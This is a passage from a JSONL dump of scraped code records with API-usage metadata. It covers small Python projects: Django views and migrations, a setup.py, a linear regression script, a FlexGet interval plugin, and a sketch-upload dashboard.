"line_number": 154, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 154, "usage_type": "name"}, {"api_name": "torch.nn.BCEWithLogitsLoss", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 156, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 163, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 163, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 174, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 185, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 185, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal", "line_number": 186, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 186, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 186, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 199, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 207, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 217, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 218, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 219, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 236, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 242, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 242, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 248, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 248, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 249, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 250, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 250, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 251, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 251, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 255, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 256, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 257, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 257, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 274, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 275, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 290, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 290, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 291, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 291, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 292, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 292, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 301, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 304, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 304, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 304, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 305, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 305, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 305, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 338, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 338, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 351, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 351, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 357, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 357, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 358, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 358, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 359, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 359, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 360, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 360, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 364, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 364, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 365, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 365, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 366, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 366, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 368, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 368, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 369, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 369, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 370, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 370, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 372, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 372, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 373, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 373, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 374, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 374, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 384, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 385, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 386, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 388, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 388, "usage_type": "call"}, {"api_name": "torch.nn.functional.tanh", "line_number": 403, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 403, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 404, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 404, "usage_type": "name"}, {"api_name": "torch.nn.functional.tanh", "line_number": 405, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 405, "usage_type": "name"}, {"api_name": "torch.nn.functional.sigmoid", "line_number": 414, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 414, "usage_type": "name"}, {"api_name": "torch.nn.functional.sigmoid", "line_number": 415, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 415, "usage_type": "name"}, {"api_name": "torch.nn.functional.tanh", "line_number": 416, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 416, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 420, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 420, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 420, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 421, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 421, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 421, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 443, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 444, "usage_type": "call"}, {"api_name": "utils.distibutions.gumbel_softmax", "line_number": 470, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 476, "usage_type": "call"}]} +{"seq_id": "72058569154", "text": "from django.shortcuts import render\r\n\r\n# Create your views here.\r\nfrom django.shortcuts import render\r\nfrom brands.models import Brand\r\nfrom model.models import Model, Series\r\n\r\n\r\ndef model_details(request, id):\r\n brand = Brand.objects.get(id=id)\r\n models = Model.objects.filter(brand=brand)\r\n data = {\r\n 'brand': brand,\r\n \"models\": models,\r\n }\r\n return render(request, \"detail.html\", context=data)\r\n\r\n\r\ndef series_detail(request, model_id, brand_id):\r\n model = Model.objects.get(id=model_id)\r\n brand = Brand.objects.get(id=brand_id)\r\n series = Series.objects.filter(model=model)\r\n data = {\r\n \"model\": model,\r\n \"series\": series,\r\n 'brand': brand,\r\n }\r\n return render(request, \"series.html\", context=data)\r\n\r\n\r\n", "repo_name": "denis2000001/hw4", "sub_path": "model/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 778, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "brands.models.Brand.objects.get", "line_number": 10, "usage_type": "call"}, {"api_name": "brands.models.Brand.objects", "line_number": 10, "usage_type": "attribute"}, {"api_name": "brands.models.Brand", "line_number": 10, "usage_type": "name"}, {"api_name": "model.models.Model.objects.filter", "line_number": 11, "usage_type": "call"}, {"api_name": "model.models.Model.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "model.models.Model", "line_number": 11, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "model.models", "line_number": 20, "usage_type": "name"}, {"api_name": "model.models.Model.objects.get", "line_number": 20, "usage_type": "call"}, {"api_name": "model.models.Model.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "model.models.Model", "line_number": 20, "usage_type": "name"}, {"api_name": "brands.models.Brand.objects.get", "line_number": 21, "usage_type": "call"}, {"api_name": "brands.models.Brand.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "brands.models.Brand", "line_number": 21, "usage_type": "name"}, {"api_name": "model.models.Series.objects.filter", "line_number": 22, "usage_type": "call"}, {"api_name": "model.models.Series.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "model.models.Series", "line_number": 22, "usage_type": "name"}, {"api_name": "model.models", "line_number": 22, "usage_type": "name"}, {"api_name": "model.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "257590610", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dianjiangapp', '0025_auto_20160422_2108'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='user',\n name='shenfengzhengid',\n field=models.CharField(max_length=255, verbose_name='\\u8eab\\u4efd\\u8bc1', blank=True),\n ),\n ]\n", "repo_name": "chenfengqiannian/djdianjiang", "sub_path": "dianjiangapp/migrations/0026_user_shenfengzhengid.py", "file_name": "0026_user_shenfengzhengid.py", "file_ext": "py", "file_size_in_byte": 460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "41575240097", "text": "from pathlib import Path\nfrom setuptools import setup, find_packages\n\nfolder = Path(__file__).parent\nreadme = (folder / 'README.md').read_text()\n\nsetup(\n name='python-latex-bridge',\n version='0.0.1',\n description='Include python variable values in a LaTeX document',\n long_description=readme,\n long_description_content_type='text/markdown',\n url='https://github.com/timmedia/python-latex-bridge',\n author='Tim Mutkala',\n author_email='contact@tim-media.com',\n license='MIT',\n packages=find_packages(exclude=('tests',)),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n include_package_data=True\n)", "repo_name": "timmedia/python-latex-bridge", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 749, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 4, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 7, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "40071519336", "text": "# Simple Linear Regression Example\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 25 14:15:04 2018\n\n@author: Ali R. Memon\n@file: simple_linear_regression.py\n@date: 25.05.2018\n\"\"\"\n\n# Importing Libraries\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('Salary_Data.csv')\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 1].values\n\n# Splitting the dataset\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state=0)\n\n# No need to apply Feature Scaling in Linear Regression. Algorithms take care of this.\n\n# Filliting model to training set\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n# Making predictions and compare predictions with y_test dataset\ny_predictor = regressor.predict(X_test)\nX_predictor = regressor.predict(X_train)\n\n# Visualizing training set results\nplt.scatter(X_train,y_train, color='red')\nplt.plot(X_train, X_predictor, color = 'blue')\nplt.title('Salary vs Experience (Training set)')\nplt.xlabel('Years of Experience')\nplt.ylabel('Salary')\nplt.show()\n\n# Visualizing test set results\nplt.scatter(X_test,y_test, color='red')\nplt.plot(X_train, X_predictor, color = 'blue')\nplt.title('Salary vs Experience (Training set)')\nplt.xlabel('Years of Experience')\nplt.ylabel('Salary')\nplt.show()\n\n \n\n\n\n\n\n\n\n\n\n\n", "repo_name": "memon-aliraza/python_machine_Learning", "sub_path": "regression/simple_linear_regression/simple_linear_regression.py", "file_name": "simple_linear_regression.py", "file_ext": "py", "file_size_in_byte": 1448, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 25, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "905794593", "text": "from __future__ import unicode_literals, division, absolute_import\nfrom builtins import * # noqa pylint: disable=unused-import, redefined-builtin\n\nimport datetime\nimport logging\n\nfrom flexget import options, plugin\nfrom flexget.config_schema import parse_interval\nfrom flexget.event import event\n\nlog = logging.getLogger('interval')\n\n\nclass PluginInterval(object):\n \"\"\"\n Allows specifying minimum interval for task execution.\n\n Format: [n] [minutes|hours|days|weeks]\n\n Example:\n\n interval: 7 days\n \"\"\"\n\n schema = {'type': 'string', 'format': 'interval'}\n\n @plugin.priority(255)\n def on_task_start(self, task, config):\n if task.options.learn:\n log.info('Ignoring task %s interval for --learn' % task.name)\n return\n last_time = task.simple_persistence.get('last_time')\n if not last_time:\n log.info('No previous run recorded, running now')\n elif task.options.interval_ignore:\n log.info('Ignoring interval because of --now')\n else:\n log.debug('last_time: %r' % last_time)\n log.debug('interval: %s' % config)\n next_time = last_time + parse_interval(config)\n log.debug('next_time: %r' % next_time)\n if datetime.datetime.now() < next_time:\n log.verbose('Interval %s not met on task %s. Use --now to override.' % (config, task.name))\n task.abort('Interval not met', silent=True)\n return\n log.debug('interval passed')\n task.simple_persistence['last_time'] = datetime.datetime.now()\n\n\n@event('plugin.register')\ndef register_plugin():\n plugin.register(PluginInterval, 'interval', api_ver=2)\n\n\n@event('options.register')\ndef register_parser_arguments():\n options.get_parser('execute').add_argument('--now', action='store_true', dest='interval_ignore', default=False,\n help='run task(s) even if the interval plugin would normally prevent it')\n", "repo_name": "bragatrosco/flexget", "sub_path": "lib/python2.7/site-packages/flexget/plugins/operate/interval.py", "file_name": "interval.py", "file_ext": "py", "file_size_in_byte": 2019, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "flexget.config_schema.parse_interval", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flexget.plugin.priority", "line_number": 27, "usage_type": "call"}, {"api_name": "flexget.plugin", "line_number": 27, "usage_type": "name"}, {"api_name": "flexget.plugin.register", "line_number": 52, "usage_type": "call"}, {"api_name": "flexget.plugin", "line_number": 52, "usage_type": "name"}, {"api_name": "flexget.event.event", "line_number": 50, "usage_type": "call"}, {"api_name": "flexget.options.get_parser", "line_number": 57, "usage_type": "call"}, {"api_name": "flexget.options", "line_number": 57, "usage_type": "name"}, {"api_name": "flexget.event.event", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "31398289593", "text": "#!/usr/bin/env python3\n\n\n__version__ = '1.0.0'\n\nfrom ArkLibPy.ArkDBMySQL import ArkDBMySQL\nimport itertools\nimport sys\n\n\ndef gen_size_desc(tx_cnt, sizing_options):\n return itertools.product(sizing_options, repeat=tx_cnt)\n\n\ndef gen_sizes(tx_cnt, sizing_options):\n for size_desc in gen_size_desc(tx_cnt, sizing_options):\n str_size_desc = ''\n area = 0\n for size in size_desc:\n str_size_desc += str(size)\n area += int(size)\n yield str_size_desc, area\n\n\nif __name__ == '__main__':\n db_config = sys.argv[1]\n db = ArkDBMySQL(db_config_file=db_config)\n\n create_table_sql = 'CREATE TABLE IF NOT EXISTS `CADisCMOS`.`SIZE_LIB` (\\\n `idSIZE_LIB` INT NOT NULL AUTO_INCREMENT,\\\n `SIZE_DESC` VARCHAR(45) NOT NULL,\\\n `TX_CNT` INT NOT NULL,\\\n `SIZE_AREA` INT NULL,\\\n PRIMARY KEY (`idSIZE_LIB`))\\\n ENGINE = InnoDB'\n\n # create the SIZE_LIB table if it does not exist\n db.run_sql(create_table_sql)\n db.set_table('SIZE_LIB')\n\n for i in range(1, 8):\n rec = {'TX_CNT': i}\n for rec['SIZE_DESC'], rec['SIZE_AREA'] in gen_sizes(rec['TX_CNT'], [1, 2, 3, 4]):\n db.insert_nocommit(rec)\n db.commit()\n", "repo_name": "fangzhouwang/CADisCMOSExplorer", "sub_path": "size_lib.py", "file_name": "size_lib.py", "file_ext": "py", "file_size_in_byte": 1220, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "itertools.product", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 26, "usage_type": "attribute"}, {"api_name": "ArkLibPy.ArkDBMySQL.ArkDBMySQL", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "6954095441", "text": "from django.shortcuts import render, redirect\nfrom django.core.files.storage import FileSystemStorage\nfrom django.forms import formset_factory\nfrom django.db import transaction\nfrom .models import Sketch, SketchFileUpload\nfrom .forms import SketchForm, ScriptUploadForm, FootageUploadForm, FinalVideoUploadForm\n\n# Test\n\nfrom django.core.files.uploadedfile import SimpleUploadedFile\n\ndef index(request):\n\n sketches_with_uploads = []\n\n sketches = Sketch.objects.all().prefetch_related('id__sketch_file_upload')\n\n for sketch in sketches:\n\n script_uploads = sketch.sketchfileupload_set.filter(type=\"SCRIPT\").all()\n footage_uploads = sketch.sketchfileupload_set.filter(type=\"FOOTAGE\").all()\n final_uploads = sketch.sketchfileupload_set.filter(type=\"FINAL\").all()\n\n sketch_with_upload = {\n \"id\": sketch.pk,\n \"title\": sketch.title,\n \"description\": sketch.description,\n \"script_uploads\": script_uploads,\n \"footage_uploads\": footage_uploads,\n \"final_uploads\": final_uploads \n }\n \n sketches_with_uploads.append(sketch_with_upload)\n\n return render(request, \"dashboard/index.html\",{ 'sketches': sketches_with_uploads })\n\ndef showsketch(request):\n\n # POST request\n if request.method == 'POST':\n\n sketch_form = SketchForm(request.POST, request.FILES)\n script_form = ScriptUploadForm(request.POST, request.FILES)\n footage_form = FootageUploadForm(request.POST, request.FILES)\n final_form = FinalVideoUploadForm(request.POST, request.FILES)\n\n forms_are_valid = (sketch_form.is_valid() and script_form.is_valid()\n and footage_form.is_valid() and final_form.is_valid())\n print(\"FORMS ARE VALID: \", forms_are_valid)\n\n if forms_are_valid:\n # Save all forms correctly\n sketch_form_val = sketch_form.save()\n # Take id from sketch_form_val and set to each\n # script, footage, and final form if they exist\n\n script_data = script_form.cleaned_data\n footage_data = footage_form.cleaned_data\n final_data = final_form.cleaned_data\n\n\n if script_data['file']:\n SketchFileUpload.objects.create(\n file=script_data['file'],\n type=\"SCRIPT\",\n sketch=sketch_form_val\n )\n\n if footage_data['file']:\n SketchFileUpload.objects.create(\n file=footage_data['file'],\n type=\"FOOTAGE\",\n sketch=sketch_form_val\n )\n\n if final_data['file']:\n SketchFileUpload.objects.create(\n file=final_data['file'],\n type=\"FINAL\",\n sketch=sketch_form_val\n )\n\n return redirect('index')\n else:\n print(\"Form is not valid\")\n\n # GET request\n else:\n \n sketch_form = SketchForm()\n script_form = ScriptUploadForm()\n footage_form = FootageUploadForm()\n final_form = FinalVideoUploadForm()\n\n context = {\n \"sketch_form\": sketch_form,\n \"script_form\": script_form,\n \"footage_form\": footage_form,\n \"final_form\": final_form,\n }\n\n return render(request, 'dashboard/sketch.html', context)\n\ndef edit_sketch(request, id):\n\n sketch = Sketch.objects.get(id=id)\n script_uploads = SketchFileUpload.objects.filter(sketch_id = id, type=\"SCRIPT\")\n footage_uploads = SketchFileUpload.objects.filter(sketch_id = id, type=\"FOOTAGE\")\n final_uploads = SketchFileUpload.objects.filter(sketch_id = id, type=\"FINAL\")\n\n if request.method == 'POST':\n filled_form = SketchForm(request.POST, instance = sketch)\n print(\"REQUEST POST: \", request.POST)\n print(\"REQUEST FILES: \", request.FILES)\n\n # Check form and deleted files\n for key, val in request.POST.items():\n if not val:\n continue \n\n if key == \"title\":\n sketch.title = val\n print(\"Title\", val)\n\n elif key == \"description\":\n sketch.description = val \n print(\"Description\", val)\n\n\n # Check file uploads (STILL NEED TO DO)\n for key, val in request.FILES.items():\n if key == \"new-script-file\":\n SketchFileUpload.objects.create(\n file=val,\n type=\"SCRIPT\",\n sketch=sketch\n )\n print(\"New Script File:\", val)\n\n elif key == \"new-footage-file\":\n SketchFileUpload.objects.create(\n file=val,\n type=\"FOOTAGE\",\n sketch=sketch\n )\n print(\"New Footage File:\", val)\n\n elif key == \"new-final-file\":\n with transaction.atomic():\n final_upload = SketchFileUpload.objects.create(\n type=\"FINAL\",\n sketch=sketch\n )\n final_upload.file.save(val.name, val)\n \n\n return redirect('index')\n else:\n \n sketch_form = SketchForm(instance = sketch)\n\n new_script_form = ScriptUploadForm(prefix=\"new-script\")\n new_footage_form = FootageUploadForm(prefix=\"new-footage\")\n new_final_form = FinalVideoUploadForm(prefix=\"new-final\")\n\n context = {\n \"sketch_form\": sketch_form,\n \"new_script_form\": new_script_form,\n \"new_footage_form\": new_footage_form,\n \"new_final_form\": new_final_form,\n \"script_uploads\": script_uploads,\n \"footage_uploads\": footage_uploads,\n \"final_uploads\": final_uploads,\n }\n\n return render(request, 'dashboard/edit_sketch.html', context)\n\ndef delete_sketch(request, id):\n sketch = Sketch.objects.get(id=id)\n uploads = SketchFileUpload.objects.filter(sketch_id = id)\n uploads.delete()\n sketch.delete()\n\n return redirect('index')\n\n\ndef delete_upload(request, sketch_id, upload_id):\n upload = SketchFileUpload.objects.get(id = upload_id)\n upload.delete()\n return redirect('/edit/' + str(sketch_id))\n", "repo_name": "BrianKozeny/prindiville-sketch-site", "sub_path": "django/dashboard/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6327, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "models.Sketch.objects.all", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Sketch.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Sketch", "line_number": 16, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 35, "usage_type": "call"}, {"api_name": "forms.SketchForm", "line_number": 42, "usage_type": "call"}, {"api_name": "forms.ScriptUploadForm", "line_number": 43, "usage_type": "call"}, {"api_name": "forms.FootageUploadForm", "line_number": 44, "usage_type": "call"}, {"api_name": "forms.FinalVideoUploadForm", "line_number": 45, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects.create", "line_number": 63, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 63, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 63, "usage_type": "name"}, {"api_name": "models.SketchFileUpload.objects.create", "line_number": 70, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 70, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 70, "usage_type": "name"}, {"api_name": "models.SketchFileUpload.objects.create", "line_number": 77, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 77, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 77, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 83, "usage_type": "call"}, {"api_name": "forms.SketchForm", "line_number": 90, "usage_type": "call"}, {"api_name": "forms.ScriptUploadForm", "line_number": 91, "usage_type": "call"}, {"api_name": "forms.FootageUploadForm", "line_number": 92, "usage_type": "call"}, {"api_name": "forms.FinalVideoUploadForm", "line_number": 93, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 102, "usage_type": "call"}, {"api_name": "models.Sketch.objects.get", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Sketch.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.Sketch", "line_number": 106, "usage_type": "name"}, {"api_name": "models.SketchFileUpload.objects.filter", "line_number": 107, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 107, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 107, "usage_type": "name"}, {"api_name": "models.SketchFileUpload.objects.filter", "line_number": 108, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 108, "usage_type": "name"}, {"api_name": "models.SketchFileUpload.objects.filter", "line_number": 109, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 109, "usage_type": "name"}, {"api_name": "forms.SketchForm", "line_number": 112, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects.create", "line_number": 133, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 133, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 133, "usage_type": "name"}, {"api_name": "models.SketchFileUpload.objects.create", "line_number": 141, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 141, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 141, "usage_type": "name"}, {"api_name": "django.db.transaction.atomic", "line_number": 149, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 149, "usage_type": "name"}, {"api_name": "models.SketchFileUpload.objects.create", "line_number": 150, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 150, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 150, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 157, "usage_type": "call"}, {"api_name": "forms.SketchForm", "line_number": 160, 